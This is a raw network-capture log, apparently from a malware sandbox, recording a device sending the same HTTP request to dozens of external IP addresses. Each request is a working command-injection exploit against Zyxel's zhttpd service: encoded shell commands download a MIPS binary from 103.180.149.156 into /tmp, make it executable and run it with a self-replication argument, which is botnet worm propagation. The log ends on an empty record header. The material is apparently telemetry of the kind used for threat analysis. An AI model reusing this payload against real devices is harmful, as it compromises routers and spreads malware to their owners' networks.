                                                      Feb 2, 2024 06:35:40.352066994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1207192.168.2.144347617.145.68.235443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.352099895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1208192.168.2.1448770108.129.239.70443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.352148056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1209192.168.2.1452296189.156.70.230443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.352191925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1210192.168.2.1448368135.2.173.31443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.352252007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1211192.168.2.144274283.243.150.108443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.352288008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1212192.168.2.144204649.11.246.78443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.352333069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1213192.168.2.1447534126.212.127.165443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.352375031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1214192.168.2.145525667.138.163.115443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.352413893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1215192.168.2.1455698149.148.86.104443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.352448940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1216192.168.2.145673614.230.45.173443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.352521896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1217192.168.2.1451424181.240.49.33443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.352544069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1218192.168.2.1456822101.80.87.228443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.352569103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1219192.168.2.144509836.63.29.224443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.352603912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1220192.168.2.145617688.163.7.139443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.352664948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1221192.168.2.143879647.1.231.199443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.352683067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1222192.168.2.145080876.74.230.204443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.352739096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1223192.168.2.1458950142.166.129.203443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.352754116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1224192.168.2.145818083.219.170.82443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.352804899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1225192.168.2.144478851.119.86.158443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.352834940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1226192.168.2.145942668.145.201.236443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.352874041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1227192.168.2.1454068222.138.57.237443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.352895975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1228192.168.2.1437760139.74.35.27443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.352930069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1229192.168.2.145280263.149.250.8443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.352963924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1230192.168.2.143915842.221.141.186443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.353014946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1231192.168.2.1456138124.173.52.59443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.353053093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1232192.168.2.143489643.178.21.34443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.353079081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1233192.168.2.1433826175.76.81.163443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.353126049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1234192.168.2.1435670112.243.102.67443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.353172064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1235192.168.2.1445048178.134.227.151443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.353207111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1236192.168.2.1458410191.88.119.231443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.353230000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1237192.168.2.1441116108.18.169.213443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.353274107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1238192.168.2.1444870203.216.120.113443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.353303909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1239192.168.2.1446196132.85.217.73443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.353358984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1240192.168.2.1451086104.33.117.238443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.353416920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1241192.168.2.1435170208.0.59.0443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.353457928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1242192.168.2.1452622141.160.103.254443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.353503942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1243192.168.2.1458618145.246.209.66443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.353543997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1244192.168.2.1448094172.5.140.253443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.353574038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1245192.168.2.144180688.142.29.58443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.353611946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1246192.168.2.143528468.33.146.90443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.353657007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1247192.168.2.143718298.86.234.216443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.353735924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1248192.168.2.1433764184.162.161.92443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.353764057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1249192.168.2.1457346178.218.27.20443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.353797913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1250192.168.2.1451230206.187.57.108443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.353847027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1251192.168.2.1443088154.247.98.241443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.353878021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1252192.168.2.144343031.18.62.183443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.353923082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1253192.168.2.1433744160.173.203.37443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.353976011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1254192.168.2.1443368207.14.143.121443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.354034901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1255192.168.2.1445290196.28.82.185443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.354074001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1256192.168.2.145030219.198.90.177443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.354101896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1257192.168.2.143399689.130.232.155443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.354151011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1258192.168.2.1435626210.37.239.243443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.354187012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1259192.168.2.1446126213.133.164.196443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.354250908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1260192.168.2.1433322162.217.236.111443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.354281902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1261192.168.2.1459172122.202.155.78443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.354434967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1262192.168.2.1435436198.240.54.203443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.354455948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1263192.168.2.1454582153.170.156.105443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.354507923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1264192.168.2.1449584200.222.28.101443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.354558945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1265192.168.2.1434352204.100.206.55443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.354598045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1266192.168.2.1437218109.143.159.74443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.354631901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1267192.168.2.1452550139.25.132.130443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.354669094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1268192.168.2.143641817.122.227.108443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.354733944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1269192.168.2.1450366221.224.123.202443
                                                      TimestampBytes transferredDirectionData
